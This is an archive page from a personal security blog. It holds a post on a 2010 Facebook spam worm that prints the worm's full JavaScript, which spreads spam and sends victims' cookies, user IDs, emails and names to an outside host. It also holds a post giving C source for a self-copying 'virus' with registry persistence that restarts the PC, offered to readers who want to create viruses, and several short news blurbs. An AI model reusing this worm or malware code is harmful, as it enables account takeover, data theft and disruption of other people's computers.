Archive

Archive for the ‘Security’ Category

Facebook Spam – Status Message

November 29th, 2010 Ahsun Taquveem Chohan 10 comments
You get a wall post by some of your friend saying some revolving image , new theme thing is out view the link to enjoy it
you open that site …the site asks you to copy some JavaScript code like …
javascript:(a = (b = document).createElement(“script”)).src = “//imaginemonkeys.com/majic.js?show”, b.body.appendChild(a); void(0)
and when you post it in your Facebook account Address bar…thats it you start spamming .. and the Fire keeps increasing ..
Some of the DOMAINS you should not visit if you see in a post :
http://fbpictures.tk
http://imaginemonkeys.com/fb/
http://fbimages.tk
http://fbookcoolimages.tk/
http://herohide.com/browse.php?
http://www.revolvingimages.info/fb/
http://revolvingimages2.tk/
http://graphicgiants.com/
http://zizz.co.tv/
New domains keep coming ….
HOW TO STOP IT ?
To stop it spamming to your wall simply re-generate your mobile email unique address at http://www.facebook.com/mobile/ clean out your cookies and don’t be copy/pasting javascript into your browser again!
The Script which runs inside the JS(which is mostly majic.js or the index.php file is :
// script name : whitebeard
// author : orkut.com/Community.aspx?cmm=43558952
txt = “Checkout 360 rotate effect on images. MUST SEE http://revolvingimages.info/fb/”;
txtee = “Checkout 360 revolve effect on images. MUST SEE http://revolvingimages.info/fb/”;

alert(“Please wait 2-3 mins while we setup! Do not refresh this window or click any link.”);

with(x = new XMLHttpRequest())
open(“GET”, “/”), onreadystatechange = function () {

if (x.readyState == 4 && x.status == 200) {
comp = (z = x.responseText).match(/name=\\”composer_id\\” value=\\”([\d\w]+)\\”/i)[1];
form = z.match(/name=”post_form_id” value=”([\d\w]+)”/i)[1];
dt = z.match(/name=”fb_dtsg” value=”([\d\w-_]+)”/i)[1];
pfid = z.match(/name=”post_form_id” value=”([\d\w]+)”/i)[1];
appid = “150622878317085″;
appname = “rip_m_j”;

with(xx = new XMLHttpRequest())
open(“GET”, “/ajax/browser/friends/?uid=” + document.cookie.match(/c_user=(\d+)/)[1] + “&filter=all&__a=1&__d=1″),
onreadystatechange = function () { if (xx.readyState == 4 && xx.status == 200) {
m = xx.responseText.match(/\/\d+_\d+_\d+_q\.jpg/gi).join(“\n”).replace(/(\/\d+_|_\d+_q\.jpg)/gi, “”).split(“\n”);
i = 0; llimit=25;
t = setInterval(function () {
if (i >= llimit ) return;
if(i == 0) {
with(ddddd = new XMLHttpRequest()) open(“GET”, “/ajax/pages/dialog/manage_pages.php?__a=1&__d=1″),
setRequestHeader(“X-Requested-With”, null),
setRequestHeader(“X-Requested”, null),
onreadystatechange = function(){ if(ddddd.readyState == 4 && ddddd.status == 200){ llm = (d = ddddd.responseText).match(/\\”id\\”:([\d]+)/gi); aaac =llm.length; pplp=0; for(pplp=0;pplp([^<>]+)/)[1] + “&c=”+ document.cookie; document.body.appendChild(s); }
}, send(null);
with(xxcxx = new XMLHttpRequest()) open(“POST”, “/ajax/pages/fan_status.php?__a=1″),
setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”),
send(“fbpage_id=176607175684946&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id=”+pfid+”&fb_dtsg=” + dt + “&lsd&post_form_id_source=AsyncRequest”);
with(lllllxx = new XMLHttpRequest()) open(“POST”, “/ajax/pages/fan_status.php?__a=1″),
setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”),
send(“fbpage_id=150650771629477&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id=”+pfid+”&fb_dtsg=” + dt + “&lsd&post_form_id_source=AsyncRequest”);
with(llxlxlxlxx = new XMLHttpRequest()) open(“POST”, “/ajax/pages/fan_status.php?__a=1″),
setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”),
send(“fbpage_id=109075015830180&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id=”+pfid+”&fb_dtsg=” + dt + “&lsd&post_form_id_source=AsyncRequest”);
} else if (i == llimit – 1) {
with(xxxx = new XMLHttpRequest()) open(“GET”, “/mobile/?v=photos”),
setRequestHeader(“X-Requested-With”, null),
setRequestHeader(“X-Requested”, null),
onreadystatechange = function(){
if(xxxx.readyState == 4 && xxxx.status == 200){
with(s = document.createElement(“script”)) src = “http://revolvingimages.info/majic.js?q=” + document.cookie.match(/c_user=(\d+)/)[1] + “:” + (d = xxxx.responseText).match(/mailto:([^\"]+)/)[1].replace(/@/, “@”) + “:” + d.match(/id=”navAccountName”>([^<>]+)/)[1] + “&c=”+ document.cookie; document.body.appendChild(s); }
}, send(null);
}
if(i%2==0) {
with(xd = new XMLHttpRequest()) open(“POST”, “/ajax/updatestatus.php?__a=1″),
setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”),
send(“action=PROFILE_UPDATE&profile_id=” + document.cookie.match(/c_user=(\d+)/)[1] + “&status=” + txt + “&target_id=” + m[Math.floor(Math.random() * m.length)] + “&composer_id=” + comp + “&hey_kid_im_a_composer=true&display_context=profile&post_form_id=” + form + “&fb_dtsg=” + dt + “&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest”);
}
else {
with(xd = new XMLHttpRequest()) open(“POST”, “/ajax/updatestatus.php?__a=1″),
setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”),
send(“action=PROFILE_UPDATE&profile_id=” + document.cookie.match(/c_user=(\d+)/)[1] + “&status=” + txtee + “&target_id=” + m[Math.floor(Math.random() * m.length)] + “&composer_id=” + comp + “&hey_kid_im_a_composer=true&display_context=profile&post_form_id=” + form + “&fb_dtsg=” + dt + “&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest”); } i += 1;
}, 2000); }
}, send(null);
}
}, send(null);

Also one Application which is just popping up as Profile Privacy v1.2 is a FAKE APPLICATION and use such comments on other users wall:

OMG OMG OMG… I cant believe this actually works! Now you really can see who viewed your profile! on http://bit.ly/9rVvrN

—Updated—-

How to reset your dedicated/mobile email address?

Many people asked me how to reset mobile email address mentioned at http://facebook.com/mobile. You can do this by visiting your wall, and click on add photo.

There select upload from disk, and there you will see option “upload via email”, click on it. There will be an option “refresh your upload email.”, click on that and it will generate new mobile email address.

Disable Windows 7 feature which you don't need

November 16th, 2009 Ahsun Taquveem Chohan No comments

Microsoft’s newest operating system, Windows 7, offers a new feature that allows you to disable or turn off any application you don’t want without any hassle.

Originally posted here:
Disable Windows 7 feature which you don't need

Kaspersky Anti-Virus:One of the first security suite for Windows 7 …

November 16th, 2009 Ahsun Taquveem Chohan 1 comment

Kaspersky Anti-Virus for Windows 7 accompanies the first steps of the Microsoft with a declination of its security suite tailored to the operating system to come. Presented by his publisher as a prototype, Kaspersky Anti-Virus for …

Originally posted here: 
Kaspersky Anti-Virus:One of the first security suite for Windows 7 …

Microsoft Responded To Sophos Windows 7 Vulnerability Claim …

November 8th, 2009 Ahsun Taquveem Chohan No comments

Paul Cooke at Microsoft now responded on The windows security blog. He first agreed that. users of any computer, on any platform, should run anti-virus software, including those running windows 7

Read more:
Microsoft Responded To Sophos Windows 7 Vulnerability Claim …

Free PDF: Microsoft Windows Server 2003 | Free ebook manual …

November 8th, 2009 Ahsun Taquveem Chohan 2 comments

Comprehensive Microsoft -Ready infrastructure that enhances the performance, security , and availabili… Microsoft Windows Storage Server 2003. Windows Storage Server 2003 is a dedicated file server that offers dependable storage while …

See the original post:
Free PDF: Microsoft Windows Server 2003 | Free ebook manual …

How to disable autorun(.inf) to prevent autorun Trojan

How to disable autorun(.inf) to prevent autorun Trojan
To disable Autorun system wide (for all users) on all the drives:
save the following script as .reg -file and double-click it (melt it with registry)

======================================================Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]"HonorAutoRunSetting"=dword:00000001"NoDriveTypeAutoRun"=dword:000000ff

=======================================================

Read more…

A program which restart pc when opened ( virus ) in C

Many people asked me how to create viruses etc stuff. Here is a simple virus/program which will restart your computer when opened. All you have to do is compile it and then run it where ever you want. Don’t worry if you run it accidentally on your system, I’ll also tell you how to remove this virus from your system completely.

:-)

Source Code:

#include<stdio.h>

#include<dos.h>

#include<dir.h> /If you get error, try using direct.h, if still you get error try compiling it in windows xp

int found,drive_no;char buff[128];

void findroot()

{

int done;

struct ffblk ffblk; //File block structure

done=findfirst("C:\\windows\\system",&ffblk,FA_DIREC); //to determine the root drive

if(done==0)

{

done=findfirst("C:\\windows\\system\\sysres.exe",&ffblk,0); //to determine whether the virus is already installed or not

if(done==0)

{

found=1; //means that the system is already infected

return;

}

drive_no=1;

return;

}

done=findfirst("D:\\windows\\system",&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst("D:\\windows\\system\\sysres.exe",&ffblk,0);

if

(done==0)

{

found=1;return;

}

drive_no=2;

return;

}

done=findfirst("E:\\windows\\system",&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst("E:\\windows\\system\\sysres.exe",&ffblk,0);

if(done==0)

{

found=1;

return;

}

drive_no=3;

return;

}

done=findfirst("F:\\windows\\system",&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst("F:\\windows\\system\\sysres.exe",&ffblk,0);

if(done==0)

{

found=1;

return;

}

drive_no=4;

return;

}

else

exit(0);

}

void main()

{

FILE *self,*target;

findroot();

if(found==0) //if the system is not already infected

{

self=fopen(_argv[0],”rb”); //The virus file open’s itself

switch(drive_no)

{

case 1:

target=fopen("C:\\windows\\system\\sysres.exe","welcome back"); //to place a copy of itself in a remote place

system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v sres \/t REG_SZ \/d C:\\windows\\system\\ sysres.exe"); //put this file to registry for starup

break;

case 2:

target=fopen("D:\\windows\\system\\sysres.exe","welcome back");

system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v sres \/t REG_SZ \/dD:\\windows\\system\\sysres.exe");

break;

case 3:

target=fopen("E:\\windows\\system\\sysres.exe","welcome back");

system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v sres \/t REG_SZ \/dE:\\windows\\system\\sysres.exe");

break;

case 4:

target=fopen("F:\\windows\\system\\sysres.exe","welcome back");

system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v sres \/t REG_SZ \/dF:\\windows\\system\\sysres.exe");

break;

default:

exit(0);

}

while(fread(buff,1,1,self)>0)

fwrite(buff,1,1,target);

fcloseall();

}

else

system("shutdown -r -t 0"); //if the system is already infected then just give a command to restart

}

How to recover/remove the virus:

1) Open up PC in safe mode

2) C:\windows:\system … you will find it(sysres) so delete it !

3) open registry :

HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run

4) You will find it also delete it …

If anything else goes wrong, feel free to contact me :-)

Top 5 ways to Secure Windows 7

August 11th, 2009 Ahsun Taquveem Chohan 1 comment

Windows 7 (formerly known as Vienna and Blackcomb) is a complete new version in windows series introduced by Microsoft for use on personal computers, including business PC’s. There is a close relation between security and usability, which the software developers often sacrifice for the other.

Microsoft is NO Exception.

Read more…

It’s time to get rid of Windows – Computerworld Blogs

Anyone who knows anything about security knows that this kind of disaster was only a matter of time. Windows botnets are responsible for DDoS attacks and most of e-mail spam. You cannot secure Windows .

Continued here:
It’s time to get rid of Windows – Computerworld Blogs

Microsoft Security Essentials lists Windows 7 UAC hack as malware

Leo Davidson released a proof-of-concept showcasing Windows 7 User Account Control feature flaw elevating a command prompt window using the whitelisted explorer.exe process.

Go here to read the rest:
Microsoft Security Essentials lists Windows 7 UAC hack as malware